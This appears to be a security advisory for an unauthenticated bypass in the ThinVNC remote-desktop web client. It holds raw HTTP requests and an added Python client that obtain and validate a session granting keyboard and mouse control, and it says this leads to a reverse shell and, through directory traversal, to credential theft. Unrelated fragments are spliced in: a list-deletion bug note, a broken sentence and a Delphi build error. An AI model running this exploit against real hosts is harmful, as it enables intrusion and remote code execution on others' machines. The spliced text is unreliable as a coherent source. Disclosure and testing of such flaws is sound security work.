ThinVNC is a pure HTML5 and AJAX remote desktop implementation. ThinVNC works in any HTML5-compliant web browser: users can reach a remote PC from any computer or mobile OS, and no plugin or other installation is required on the client side.
If you have a count of e.g. 4 and want to delete index 3, it moves the last entry's name to the deleted position but leaves the object in place.
So the whole list is corrupted.
ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via http://thin-vnc:8080/cmd?cmd=connect by obtaining a valid SID without any kind of authentication. Because the SID also grants keyboard and mouse control, it is possible to achieve code execution on the server by sending keyboard or mouse events with it.
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score:
10.0
Steps to reproduce
Send a request to the application in order to obtain a valid SID.
GET /cmd?cmd=connect&destAddr=poc&id=0 HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=
Obtain the SID from the server response and send a second request in order to validate the SID, requesting mouse and keyboard control in the same call.
GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=[SID] HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=[SID]
Now it is possible to send keystrokes or mouse moves to the server using the validated SID.
An exploit that injects keystrokes through this session can be used to obtain a reverse shell on the host running the ThinVNC application.
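The two-request exchange above, carried out by a small client, as an added example that is not part of the original advisory or of the ThinVNC project. The host and port are placeholders, and the way the SID is located in the connect response (a SID cookie or an id field in the body) is an assumption to be adjusted to what the target actually returns; everything else in the requests is taken from the advisory.

```python
"""Reproduce the ThinVNC 1.0b1 authentication bypass: cmd=connect hands out a
SID with no credentials, cmd=start binds it with mouse and keyboard control.

Added example. HOST/PORT and the SID-extraction patterns are assumptions and
are not part of the original advisory.
"""
import http.client
import re
from typing import Optional
from urllib.parse import urlencode

# Placeholders: point these at a ThinVNC instance you are authorised to test.
HOST = "172.16.28.140"
PORT = 8081


def base_headers(host: str, port: int, sid: str = "") -> dict:
    """Headers from the advisory's requests; the SID cookie is empty on the first call."""
    return {
        "Connection": "close",
        "Accept": "*/*",
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"http://{host}:{port}/",
        "Cookie": f"SID={sid}",
    }


def connect_path() -> str:
    """Step 1: cmd=connect with id=0 and no session; the server hands out a SID."""
    return "/cmd?" + urlencode({"cmd": "connect", "destAddr": "poc", "id": "0"})


def start_path(sid: str) -> str:
    """Step 2: cmd=start bound to the SID, asking for mouse and keyboard control."""
    params = {
        "cmd": "start", "mouseControl": "true", "kbdControl": "true",
        "quality": "85", "pixelFormat": "0", "monitor": "0", "id": sid,
    }
    return "/cmd?" + urlencode(params)


# Assumed response shapes: a SID cookie, a "SID=..." token in the body, or a
# JSON body with an "id" field. Adjust to the real connect response.
SID_PATTERNS = [
    re.compile(r"SID=([A-Za-z0-9_-]+)"),
    re.compile(r'"id"\s*:\s*"([A-Za-z0-9_-]+)"'),
]


def extract_sid(set_cookie: str, body: str) -> Optional[str]:
    """Pull the freshly issued SID out of the connect response, ignoring the id=0 we sent."""
    for text in (set_cookie, body):
        for pattern in SID_PATTERNS:
            match = pattern.search(text)
            if match and match.group(1) != "0":
                return match.group(1)
    return None


def bypass(host: str = HOST, port: int = PORT) -> str:
    """Run both steps; returns a SID that the server has accepted for cmd=start."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", connect_path(), headers=base_headers(host, port))
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    sid = extract_sid(resp.getheader("Set-Cookie", "") or "", body)
    conn.close()
    if sid is None:
        raise RuntimeError(f"no SID found in connect response: {body[:200]!r}")

    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", start_path(sid), headers=base_headers(host, port, sid))
    resp = conn.getresponse()
    resp.read()
    conn.close()
    if resp.status != 200:
        raise RuntimeError(f"cmd=start rejected the SID: HTTP {resp.status}")
    return sid


if __name__ == "__main__":
    print("validated SID:", bypass())
```

A SID returned by bypass() is the only thing the server checks on the subsequent keyboard and mouse event requests, which is why the finding is rated as unauthenticated remote code execution rather than a mere information leak.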
An authenticated attacker can compromise the VNC server even when it is password protected. There's a bug in the web client that is vulnerable to directory traversal. Accessing the credentials could compromise the whole VNC server and give an attacker terminal access to the remote system.
are not included and required.
There might be other files missing, but the build process stops right there, so I can't tell for sure.
[DCC Fatal Error] ThinVnc.Manager.pas(50): F1026 File not found: 'ThinVnc.WebSockets.dcu'